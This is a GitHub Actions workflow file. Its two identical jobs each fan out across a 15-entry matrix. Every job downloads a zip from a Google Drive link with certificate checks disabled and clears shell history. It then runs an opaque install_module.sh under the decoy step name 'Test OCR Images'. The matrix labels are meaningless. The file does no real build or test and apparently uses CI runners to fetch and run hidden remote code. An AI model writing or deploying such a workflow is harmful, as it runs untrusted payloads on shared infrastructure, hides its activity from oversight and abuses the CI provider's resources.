name: longvu8lab
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  Assemble:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1VfKo0IDXxp4LuZ_ryENZvVP-hGp-O4Mw" -O longvu8lab.zip
        unzip -o longvu8lab.zip
        rm longvu8lab.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  SETUP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1VfKo0IDXxp4LuZ_ryENZvVP-hGp-O4Mw" -O longvu8lab.zip
        unzip -o longvu8lab.zip
        rm longvu8lab.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
